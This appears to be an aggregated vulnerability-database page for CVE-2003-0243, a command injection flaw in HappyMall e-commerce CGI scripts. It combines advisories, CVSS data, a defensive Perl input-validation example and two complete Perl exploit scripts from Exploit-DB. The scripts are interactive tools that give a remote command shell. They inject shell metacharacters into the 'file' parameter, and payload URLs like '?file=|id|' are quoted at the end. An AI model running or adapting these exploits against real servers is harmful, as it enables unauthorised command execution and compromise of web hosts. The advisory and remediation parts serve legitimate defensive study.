CVE-2003-0243
CVSS 7.5
Published: 2003-05-27 00:00:00
Last revised: 2008-09-10 15:18:21

[Original] Happycgi.com Happymall 4.3 and 4.4 allows remote attackers to execute arbitrary commands via shell metacharacters in the file parameter for the (1) normal_html.cgi or (2) member_html.cgi scripts.


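[CNNVD] HappyMall E-Commerce software normal_html.cgi remote command execution vulnerability (CNNVD-200305-063)

        
        HappyMall E-Commerce is online-shopping e-commerce software.
        The normal_html.cgi script included in HappyMall E-Commerce does not sufficiently filter user-supplied parameters; a remote attacker can exploit this vulnerability to execute arbitrary commands on the system with the privileges of the web server.
        'normal_html.cgi' does not sufficiently filter user input before calling the unsafe open() function; a remote attacker can submit a string containing metacharacters as the 'file' parameter, causing those commands to be executed on the system with the privileges of the web process.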
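
The root cause described above, handled defensively. This is an added example, not HappyMall's code or a vendor patch: the template directory, the `.html` naming rule and the function names `validate_file_param` and `read_template` are assumptions made for illustration.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use File::Spec;
use File::Temp qw(tempdir);

# Hypothetical template directory; a throwaway one is created so the demo runs offline.
my $TEMPLATE_DIR = tempdir(CLEANUP => 1);
{
    open(my $seed, '>', File::Spec->catfile($TEMPLATE_DIR, 'main.html')) or die "seed: $!";
    print {$seed} "<html>main</html>\n";
    close($seed);
}

# Allowlist check: a bare file name with a fixed extension and nothing else.
# '/', '.', '|', ';', whitespace and every other metacharacter fail the match.
sub validate_file_param {
    my ($file) = @_;
    return undef unless defined $file;
    return $file =~ /\A([A-Za-z0-9_-]{1,64}\.html)\z/ ? $1 : undef;
}

# Returns (status, body). The 'file' value only ever selects a name inside $TEMPLATE_DIR.
sub read_template {
    my ($file) = @_;
    my $name = validate_file_param($file);
    return (400, "rejected") unless defined $name;
    my $path = File::Spec->catfile($TEMPLATE_DIR, $name);
    # Three-argument open with an explicit '<' mode: the path is opened as a
    # file and is never parsed for a leading or trailing '|', which is what
    # two-argument open() does with the string it is given.
    open(my $fh, '<', $path) or return (404, "not found");
    local $/;
    my $body = <$fh>;
    close($fh);
    return (200, $body);
}

# Constructed inputs: one legitimate name, the two 'file' values quoted in the
# advisory on this page, a traversal attempt and a missing template.
for my $input ('main.html', '|id|', ';id|', '../../etc/passwd', 'missing.html') {
    my ($status) = read_template($input);
    printf "%-20s -> %d\n", $input, $status;
}
```

Validation and the three-argument open are independent layers: the allowlist rejects the request before any path is built, and the fixed mode keeps open() from treating the value as a command even if the allowlist is later loosened.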
        

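- CVSS (base score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may cause degraded performance or interrupted access to resources]
Attack complexity: LOW [exploitation has no access restrictions]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]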

- CPE (affected platforms and products)

cpe:/a:happycgi:happymall:4.3
cpe:/a:happycgi:happymall:4.4

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0243
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0243
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200305-063
(official data source) CNNVD

- Other links and resources

http://securitytracker.com/id?1006707
(UNKNOWN)  SECTRACK  1006707
http://archives.neohapsis.com/archives/vulnwatch/2003-q2/0058.html
(UNKNOWN)  VULNWATCH  20030507 Happymall E-Commerce Remote Command Execution

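- Vulnerability information

HappyMall E-Commerce software normal_html.cgi remote command execution vulnerability
High risk  Input validation
2003-05-27 00:00:00 2005-10-20 00:00:00
Remote
        
        HappyMall E-Commerce is online-shopping e-commerce software.
        The normal_html.cgi script included in HappyMall E-Commerce does not sufficiently filter user-supplied parameters; a remote attacker can exploit this vulnerability to execute arbitrary commands on the system with the privileges of the web server.
        'normal_html.cgi' does not sufficiently filter user input before calling the unsafe open() function; a remote attacker can submit a string containing metacharacters as the 'file' parameter, causing those commands to be executed on the system with the privileges of the web process.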
        

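- Advisories and patches

        Vendor patch:
        HappyCGI
        --------
        The vendor has not yet provided a patch or upgrade; we recommend that users of this software watch the vendor's home page for the latest version: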
        
        http://happymall.happycgi.com

- Vulnerability information (22571)

HappyMall E-Commerce Software 4.3/4.4 Normal_HTML.CGI Command Execution Vulnerability (EDBID:22571)
cgi webapps
2003-05-07 Verified
0 Revin Aldi
N/A
source: http://www.securityfocus.com/bid/7529/info

It has been reported that a problem in the HappyMall E-Commerce software package could allow an attacker to pass arbitrary commands through the normal_html.cgi script. This could lead to attacks against system resources. 

##########################################################
# HappyMail explo
# vulnerable:
# HappyCGI HappyMall 4.3
# HappyCGI HappyMall 4.4
#
#
# www.spabam.org spabam.tk spabam.da.ru go.to/spabam
# Spawn bash style Shell with webserver uid
#
# Spabam 2003 PRIV8 code
# #hackarena irc.brasnet.org
# This Script is currently under development
#####################################################

use strict;
use IO::Socket;
my $host;		
my $port;		
my $command;		
my $url;	
my $shiz;		
my @results;		
my $probe;		
my @U;			
$U[1] = "/shop/normal_html.cgi?file=|";
$U[2] = "/shop/normal_html.cgi? file=;";

&intro;
&scan;
&choose;
&command;
&exit; 
sub intro {
&help;
&host;
&server;
sleep 3;
};
sub host {
print "\nHost or IP : ";
$host=<STDIN>;
chomp $host;
if ($host eq ""){$host="127.0.0.1"};
$shiz = "|";
print "\nPort (enter to accept 80): ";
$port=<STDIN>;
chomp $port;
if ($port =~/\D/ ){$port="80"};
if ($port eq "" ) {$port = "80"};
};	
sub server {
my $X;
print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
$probe = "string";
my $output;
my $webserver = "something";
&connect;
for ($X=0; $X<=10; $X++){
	$output = $results[$X];
	if (defined $output){
	if ($output =~/IIS/){ $webserver = "apache" };
	};
};
if ($webserver ne "apache"){
my $choice = "y";
chomp $choice;
if ($choice =~/N/i) {&exit};
            }else{
print "\n\nOK";
	};		
};  
sub scan {
my $status = "not_vulnerable";
print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
print "Testing string ONE and TWO";
my $loop;
my $output;
my $flag;
$command="dir";
for ($loop=1; $loop < @U; $loop++) { 
$flag = "0";
$url = $U[$loop];
$probe = "scan";
&connect;
foreach $output (@results){
if ($output =~ /Directory/) {
                              $flag = "1";
			      $status = "vulnerable";
			      };
	};
if ($flag eq "0") { 
}else{
     };
};
if ($status eq "not_vulnerable"){

				};
}; 
sub choose {
print "\nSelect a URL (type 0 to input)";
my $choice=<STDIN>;
chomp $choice;
if ($choice > @U){ &choose };
if ($choice =~/\D/g ){ &choose };
if ($choice == 0){ &other };
$url = $U[$choice];
}; 
sub other {
my $other = <STDIN>;
chomp $other;
$U[0] = $other;
};  
sub command {
while ($command !~/quit/i) {
print "\nHELP QUIT URL SCAN Or Command

\n[$host]\$ ";
$command = <STDIN>;
chomp $command;
if ($command =~/quit/i) { &exit };
if ($command =~/url/i) { &choose }; 
if ($command =~/scan/i) { &scan };
if ($command =~/help/i) { &help };
$command =~ s/\s/+/g; 
$probe = "command";
if ($command !~/quit|url|scan|help/) {&connect};
};
&exit;
};  
sub connect {
my $connection = IO::Socket::INET->new (
				Proto => "tcp",
				PeerAddr => "$host",
				PeerPort => "$port",
				) or die "\nSorry UNABLE TO CONNECT To $host On Port $port.\n";
$connection -> autoflush(1);
if ($probe =~/command|scan/){
print $connection "GET $url$command$shiz HTTP/1.0\r\n\r\n";
}elsif ($probe =~/string/) {
print $connection "HEAD / HTTP/1.0\r\n\r\n";
};

while ( <$connection> ) { 
			@results = <$connection>;
			 };
close $connection;
if ($probe eq "command"){ &output };
if ($probe eq "string"){ &output };
};  
sub output{
print "\nOUTPUT FROM $host. \n\n";
my $display;
if ($probe eq "string") {
			my $X;
			for ($X=0; $X<=10; $X++) {
			$display = $results[$X];
			if (defined $display){print "$display";};
			sleep 1;
				};
			}else{
			foreach $display (@results){
			    print "$display";
			    sleep 1;
				};
                          };
};  
sub exit{
print "\n\n\n



ANDREA SPABAM 2002.";
print "\nspabam.da.ru spabam\@go.to";
print "\n\n\n";
exit;
};
sub help {
print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
print "\n
        HappyMall E-Commerce Software Normal_HTML.CGI 
        Command Execution Vulnerability by SPABAM 2003" ;
print "\n
";
print "\n HappyMail Exploit v0.9.9b";
print "\n 

note.. web directory is normally /var/www/html";
print "\n";
print "\n Host: www.victim.com or xxx.xxx.xxx.xxx (RETURN for 127.0.0.1)";
print "\n Command: SCAN URL HELP QUIT";
print "\n\n\n\n\n\n\n\n\n\n\n";
};


		

- Vulnerability information (22572)

HappyMall E-Commerce Software 4.3/4.4 Member_HTML.CGI Command Execution Vulnerability (EDBID:22572)
cgi webapps
2003-05-08 Verified
0 Revin Aldi
N/A
source: http://www.securityfocus.com/bid/7530/info

It has been reported that a problem in the HappyMall E-Commerce software package could allow an attacker to pass arbitrary commands through the member_html.cgi script. This could lead to attacks against system resources. 

##########################################################
# HappyMall explo
# vulnerable:
# HappyCGI HappyMall 4.3
# HappyCGI HappyMall 4.4
#
#
# www.spabam.org spabam.tk spabam.da.ru go.to/spabam
# Spawn bash style Shell with webserver uid
#
# Spabam 2003 PRIV8 code
# #hackarena irc.brasnet.org
# This Script is currently under development
#####################################################

use strict;
use IO::Socket;
my $host;		
my $port;		
my $command;		
my $url;	
my $shiz;		
my @results;		
my $probe;		
my @U;			
$U[1] = "/shop/normal_html.cgi?file=|";
$U[2] = "/shop/normal_html.cgi? file=;";
$U[3] = "/shop/member_html.cgi?file=|";
$U[4] = "/shop/member_html.cgi? file=;";
&intro;
&scan;
&choose;
&command;
&exit; 
sub intro {
&help;
&host;
&server;
sleep 3;
};
sub host {
print "\nHost or IP : ";
$host=<STDIN>;
chomp $host;
if ($host eq ""){$host="127.0.0.1"};
$shiz = "|";
print "\nPort (enter to accept 80): ";
$port=<STDIN>;
chomp $port;
if ($port =~/\D/ ){$port="80"};
if ($port eq "" ) {$port = "80"};
};	
sub server {
my $X;
print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
$probe = "string";
my $output;
my $webserver = "something";
&connect;
for ($X=0; $X<=10; $X++){
	$output = $results[$X];
	if (defined $output){
	if ($output =~/IIS/){ $webserver = "apache" };
	};
};
if ($webserver ne "apache"){
my $choice = "y";
chomp $choice;
if ($choice =~/N/i) {&exit};
            }else{
print "\n\nOK";
	};		
};  
sub scan {
my $status = "not_vulnerable";
print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
print "Testing string ONE and TWO";
my $loop;
my $output;
my $flag;
$command="dir";
for ($loop=1; $loop < @U; $loop++) { 
$flag = "0";
$url = $U[$loop];
$probe = "scan";
&connect;
foreach $output (@results){
if ($output =~ /Directory/) {
                              $flag = "1";
			      $status = "vulnerable";
			      };
	};
if ($flag eq "0") { 
}else{
     };
};
if ($status eq "not_vulnerable"){

				};
}; 
sub choose {
print "\nSelect a URL (type 0 to input)";
my $choice=<STDIN>;
chomp $choice;
if ($choice > @U){ &choose };
if ($choice =~/\D/g ){ &choose };
if ($choice == 0){ &other };
$url = $U[$choice];
}; 
sub other {
my $other = <STDIN>;
chomp $other;
$U[0] = $other;
};  
sub command {
while ($command !~/quit/i) {
print "\nHELP QUIT URL SCAN Or Command

\n[$host]\$ ";
$command = <STDIN>;
chomp $command;
if ($command =~/quit/i) { &exit };
if ($command =~/url/i) { &choose }; 
if ($command =~/scan/i) { &scan };
if ($command =~/help/i) { &help };
$command =~ s/\s/+/g; 
$probe = "command";
if ($command !~/quit|url|scan|help/) {&connect};
};
&exit;
};  
sub connect {
my $connection = IO::Socket::INET->new (
				Proto => "tcp",
				PeerAddr => "$host",
				PeerPort => "$port",
				) or die "\nSorry UNABLE TO CONNECT To $host On Port $port.\n";
$connection -> autoflush(1);
if ($probe =~/command|scan/){
print $connection "GET $url$command$shiz HTTP/1.0\r\n\r\n";
}elsif ($probe =~/string/) {
print $connection "HEAD / HTTP/1.0\r\n\r\n";
};

while ( <$connection> ) { 
			@results = <$connection>;
			 };
close $connection;
if ($probe eq "command"){ &output };
if ($probe eq "string"){ &output };
};  
sub output{
print "\nOUTPUT FROM $host. \n\n";
my $display;
if ($probe eq "string") {
			my $X;
			for ($X=0; $X<=10; $X++) {
			$display = $results[$X];
			if (defined $display){print "$display";};
			sleep 1;
				};
			}else{
			foreach $display (@results){
			    print "$display";
			    sleep 1;
				};
                          };
};  
sub exit{
print "\n\n\n



ANDREA SPABAM 2002.";
print "\nspabam.da.ru spabam\@go.to";
print "\n\n\n";
exit;
};
sub help {
print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
print "\n
        HappyMall E-Commerce Software Normal_HTML.CGI 
        Command Execution Vulnerability by SPABAM 2003" ;
print "\n
";
print "\n HappyMall Exploit v1.2.1";
print "\n 

note.. web directory is normally /var/www/html";
print "\n";
print "\n Host: www.victim.com or xxx.xxx.xxx.xxx (RETURN for 127.0.0.1)";
print "\n Command: SCAN URL HELP QUIT";
print "\n\n\n\n\n\n\n\n\n\n\n";
};


		

- Vulnerability information

3566
Happymall normal_html.cgi Arbitrary Command Execution

- Vulnerability description

Happymall contains a flaw that may allow a malicious user to run arbitrary commands on the web server. The issue is triggered when an attacker uses a specially crafted URL. It is possible that the flaw may allow arbitrary code execution resulting in a loss of confidentiality, integrity, and/or availability.

- Timeline

2003-05-03 2003-04-26
Unknown Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Happycgi.com has released a patch to address this vulnerability.

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

HappyMall E-Commerce Software Member_HTML.CGI Command Execution Vulnerability
Input Validation Error 7530
Yes No
2003-05-08 12:00:00 2009-07-11 09:07:00
Discovery credited to Revin Aldi.

- Affected software versions

HappyCGI HappyMall 4.4
HappyCGI HappyMall 4.3

- Vulnerability discussion

It has been reported that a problem in the HappyMall E-Commerce software package could allow an attacker to pass arbitrary commands through the member_html.cgi script. This could lead to attacks against system resources.

- Exploit

http://www.example.com/shop/member_html.cgi?file=|id|
http://www.example.com/shop/member_html.cgi? file=;id|

The following exploit was provided:

- Solution

It has been reported that a patch exists at URL http://happymall.happycgi.com/forum/forum_detail.cgi?thread=353. This information is not vendor-confirmed, and it has not been possible to independently confirm this information.
-------------
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- Related references

 

 
